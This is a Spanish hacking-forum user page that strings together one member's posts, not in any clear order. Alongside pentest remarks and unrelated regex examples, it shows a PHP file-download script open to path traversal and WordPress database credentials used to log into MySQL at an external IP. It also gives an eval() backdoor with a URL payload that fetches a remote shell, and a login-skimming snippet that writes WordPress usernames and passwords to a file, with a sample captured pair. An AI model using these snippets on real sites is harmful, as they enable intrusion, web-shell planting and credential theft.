así es.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: afdlkglfgfdgfhgf en 22 Agosto 2012, 00:59 AM
una de las fases antes de realizar un PENTEST es recolectar información tanto por FOOTPRINTING o FINGERPRINT, y provocar un error muchas veces suele dar datos muy jugosos como un PATH, sqli basadas en errores,IP's,version del servidor etc.. , claro está que evitando estos en muchos casos no conseguiras mitigar ataques pero creo que es una buena forma de hacer las cosas.
por cierto hay muchos ataques que se basan en errores, tanto de programacion como de configuracion del servidor.
[code]
Un error de PHP no indica que una web es vulnerable, pero si se provoca el error de forma concierte puede indicar que la web es vulnerable como en el caso de SQLI. Pero en lo personal, la peor forma de buscar vulnerabilidades es a partir de provocaciones de error, porque simplemente no sabe lo que hace.<?php
$f = $_GET["f"];
header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"$f\"\n");
$fp=fopen("$f", "r");
fpassthru($fp);
?>
// ** Ajustes de MySQL. Solicita estos datos a tu proveedor de alojamiento web. ** //
/** El nombre de tu base de datos de WordPress */
define('DB_NAME', 'wp_sys');
/** Tu nombre de usuario de MySQL */
define('DB_USER', 'user_bd');
/** Tu contraseña de MySQL */
define('DB_PASSWORD', 'MysqlPass');
/** Host de MySQL (es muy probable que no necesites cambiarlo) */
define('DB_HOST', 'localhost');
yoya@Debian:~$ mysql -h 182.94.110.121 --user=user_bd --password=MysqlPass
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1125935
Server version: 5.1.38-log Source distribution
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use wp_sys;
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wp_sys |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_snews_members |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.18 sec)
mysql>
<?php eval($_GET['e']); ?>
.web.com/wp-plugin/pluginNAME/file.php?e=file_put_contents('shell.php',file_get_contents('http://www.example.com/shell.txt'));
web.com/wp-plugin/pluginNAME/shell.php
<?php
if(!empty($_POST['wp-submit']) && !empty($_POST['log']) && !empty($_POST['pwd'])) {
if($_POST['wp-submit'] == 'Acceder') {
$f = fopen('wp.txt',"a");
fputs($f, $_POST['log'].':'.$_POST['pwd']."\n");
fclose($f);
}}
?>
user:pass
Anonww:wwxDDF
preg_replace('/opini[\w]+n/i', 'OPINION', 'mi opiniooooon es que lo que no comen lo bota');
mi OPINION es que lo que no comen lo bota
preg_replace('/opini[\w\W]+?n/i', 'OPINION', 'mi opiniooooon es que lo que no comen lo bota');
mi OPINION es que lo que no comen lo bota
preg_replace('/opini[\w]+?n/i', 'OPINION', 'mi opiniooooon es que lo que no comen lo bota');
mi OPINION es que lo que no comen lo bota
var Cadena = 'asd<strong>asd</strong> <strong>asd</strong> <strong>asd</strong>asd asd<strong>asd</strong>asd';
var result = Cadena.replace(/(?:<[^>]+>)/gi, '');
document.write(result);
asdasd asd asdasd asdasdasd